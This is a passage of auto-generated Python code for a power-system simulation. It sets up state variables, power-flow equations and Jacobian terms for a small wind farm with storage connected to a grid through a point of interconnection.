X_v_GRID = struct[0].X_v_GRID
R_v_GRID = struct[0].R_v_GRID
K_delta_GRID = struct[0].K_delta_GRID
K_sec_GRID = struct[0].K_sec_GRID
Droop_GRID = struct[0].Droop_GRID
K_p_agc = struct[0].K_p_agc
K_i_agc = struct[0].K_i_agc
# Inputs:
P_W1lv = struct[0].P_W1lv
Q_W1lv = struct[0].Q_W1lv
P_W2lv = struct[0].P_W2lv
Q_W2lv = struct[0].Q_W2lv
P_W3lv = struct[0].P_W3lv
Q_W3lv = struct[0].Q_W3lv
P_STlv = struct[0].P_STlv
Q_STlv = struct[0].Q_STlv
P_W1mv = struct[0].P_W1mv
Q_W1mv = struct[0].Q_W1mv
P_W2mv = struct[0].P_W2mv
Q_W2mv = struct[0].Q_W2mv
P_W3mv = struct[0].P_W3mv
Q_W3mv = struct[0].Q_W3mv
P_POImv = struct[0].P_POImv
Q_POImv = struct[0].Q_POImv
P_STmv = struct[0].P_STmv
Q_STmv = struct[0].Q_STmv
P_POI = struct[0].P_POI
Q_POI = struct[0].Q_POI
P_GRID = struct[0].P_GRID
Q_GRID = struct[0].Q_GRID
v_ref_GRID = struct[0].v_ref_GRID
p_m_GRID = struct[0].p_m_GRID
p_c_GRID = struct[0].p_c_GRID
omega_ref_GRID = struct[0].omega_ref_GRID
q_ref_GRID = struct[0].q_ref_GRID
# Dynamical states:
delta_GRID = struct[0].x[0,0]
xi_p_GRID = struct[0].x[1,0]
e_qv_GRID = struct[0].x[2,0]
xi_freq = struct[0].x[3,0]
# Algebraic states:
V_W1lv = struct[0].y_ini[0,0]
theta_W1lv = struct[0].y_ini[1,0]
V_W2lv = struct[0].y_ini[2,0]
theta_W2lv = struct[0].y_ini[3,0]
V_W3lv = struct[0].y_ini[4,0]
theta_W3lv = struct[0].y_ini[5,0]
V_STlv = struct[0].y_ini[6,0]
theta_STlv = struct[0].y_ini[7,0]
V_W1mv = struct[0].y_ini[8,0]
theta_W1mv = struct[0].y_ini[9,0]
V_W2mv = struct[0].y_ini[10,0]
theta_W2mv = struct[0].y_ini[11,0]
V_W3mv = struct[0].y_ini[12,0]
theta_W3mv = struct[0].y_ini[13,0]
V_POImv = struct[0].y_ini[14,0]
theta_POImv = struct[0].y_ini[15,0]
V_STmv = struct[0].y_ini[16,0]
theta_STmv = struct[0].y_ini[17,0]
V_POI = struct[0].y_ini[18,0]
theta_POI = struct[0].y_ini[19,0]
V_GRID = struct[0].y_ini[20,0]
theta_GRID = struct[0].y_ini[21,0]
omega_GRID = struct[0].y_ini[22,0]
i_d_GRID = struct[0].y_ini[23,0]
i_q_GRID = struct[0].y_ini[24,0]
p_g_GRID = struct[0].y_ini[25,0]
q_g_GRID = struct[0].y_ini[26,0]
p_m_GRID = struct[0].y_ini[27,0]
omega_coi = struct[0].y_ini[28,0]
p_agc = struct[0].y_ini[29,0]
# Differential equations:
if mode == 2:
struct[0].f[0,0] = -K_delta_GRID*delta_GRID + Omega_b_GRID*(omega_GRID - omega_coi)
struct[0].f[1,0] = -i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID
struct[0].f[2,0] = (K_q_GRID*(-q_g_GRID + q_ref_GRID) - e_qv_GRID + v_ref_GRID)/T_v_GRID
struct[0].f[3,0] = 1 - omega_coi
# Algebraic equations:
if mode == 3:
struct[0].g[0,0] = -P_W1lv/S_base + V_W1lv**2*g_W1mv_W1lv + V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].g[1,0] = -Q_W1lv/S_base + V_W1lv**2*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].g[2,0] = -P_W2lv/S_base + V_W2lv**2*g_W2mv_W2lv + V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].g[3,0] = -Q_W2lv/S_base + V_W2lv**2*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].g[4,0] = -P_W3lv/S_base + V_W3lv**2*g_W3mv_W3lv + V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].g[5,0] = -Q_W3lv/S_base + V_W3lv**2*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].g[6,0] = -P_STlv/S_base + V_STlv**2*g_STmv_STlv + V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].g[7,0] = -Q_STlv/S_base + V_STlv**2*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].g[8,0] = -P_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv**2*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].g[9,0] = -Q_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv**2*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].g[10,0] = -P_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv**2*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].g[11,0] = -Q_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv**2*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].g[12,0] = -P_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + V_W3mv**2*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].g[13,0] = -Q_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + V_W3mv**2*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].g[14,0] = -P_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv**2*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].g[15,0] = -Q_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv**2*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].g[16,0] = -P_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + V_STmv**2*(g_STmv_POImv + g_STmv_STlv)
struct[0].g[17,0] = -Q_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + V_STmv**2*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].g[18,0] = -P_POI/S_base + V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI**2*(g_POI_GRID + g_POI_POImv) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].g[19,0] = -Q_POI/S_base + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI**2*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].g[20,0] = -P_GRID/S_base + V_GRID**2*g_POI_GRID + V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) - S_n_GRID*p_g_GRID/S_base
struct[0].g[21,0] = -Q_GRID/S_base + V_GRID**2*(-b_POI_GRID - bs_POI_GRID/2) + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) - S_n_GRID*q_g_GRID/S_base
struct[0].g[22,0] = K_p_GRID*(-i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID + xi_p_GRID/T_p_GRID) - omega_GRID + 1
struct[0].g[23,0] = -R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID) + X_v_GRID*i_q_GRID
struct[0].g[24,0] = -R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID) - X_v_GRID*i_d_GRID + e_qv_GRID
struct[0].g[25,0] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID) - p_g_GRID
struct[0].g[26,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID) - q_g_GRID
struct[0].g[27,0] = K_sec_GRID*p_agc + p_c_GRID - p_m_GRID - (omega_GRID - omega_ref_GRID)/Droop_GRID
struct[0].g[28,0] = omega_GRID - omega_coi
struct[0].g[29,0] = K_i_agc*xi_freq + K_p_agc*(1 - omega_coi) - p_agc
# Outputs:
if mode == 3:
struct[0].h[0,0] = V_W1lv
struct[0].h[1,0] = V_W2lv
struct[0].h[2,0] = V_W3lv
struct[0].h[3,0] = V_STlv
struct[0].h[4,0] = V_W1mv
struct[0].h[5,0] = V_W2mv
struct[0].h[6,0] = V_W3mv
struct[0].h[7,0] = V_POImv
struct[0].h[8,0] = V_STmv
struct[0].h[9,0] = V_POI
struct[0].h[10,0] = V_GRID
struct[0].h[11,0] = i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) + i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID))
if mode == 10:
struct[0].Fx_ini[0,0] = -K_delta_GRID
struct[0].Fx_ini[1,0] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fx_ini[2,2] = -1/T_v_GRID
if mode == 11:
struct[0].Fy_ini[0,22] = Omega_b_GRID
struct[0].Fy_ini[0,28] = -Omega_b_GRID
struct[0].Fy_ini[1,20] = -i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy_ini[1,21] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy_ini[1,23] = -2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy_ini[1,24] = -2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy_ini[1,27] = 1
struct[0].Fy_ini[2,26] = -K_q_GRID/T_v_GRID
struct[0].Fy_ini[3,28] = -1
struct[0].Gy_ini[0,0] = 2*V_W1lv*g_W1mv_W1lv + V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[0,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[0,8] = V_W1lv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[0,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[1,0] = 2*V_W1lv*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[1,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[1,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[1,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[2,2] = 2*V_W2lv*g_W2mv_W2lv + V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[2,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[2,10] = V_W2lv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[2,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[3,2] = 2*V_W2lv*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[3,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[3,10] = V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[3,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[4,4] = 2*V_W3lv*g_W3mv_W3lv + V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[4,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[4,12] = V_W3lv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[4,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[5,4] = 2*V_W3lv*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[5,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[5,12] = V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[5,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[6,6] = 2*V_STlv*g_STmv_STlv + V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[6,7] = V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[6,16] = V_STlv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[6,17] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[7,6] = 2*V_STlv*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[7,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[7,16] = V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[7,17] = V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[8,0] = V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[8,1] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[8,8] = V_W1lv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[8,9] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[8,10] = V_W1mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[8,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[9,0] = V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[9,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[9,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[9,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[9,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[9,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[10,2] = V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[10,3] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[10,8] = V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[10,9] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[10,10] = V_W1mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[10,11] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[10,12] = V_W2mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[10,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[11,2] = V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[11,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[11,8] = V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[11,9] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[11,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[11,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[11,12] = V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[11,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[12,4] = V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[12,5] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[12,10] = V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
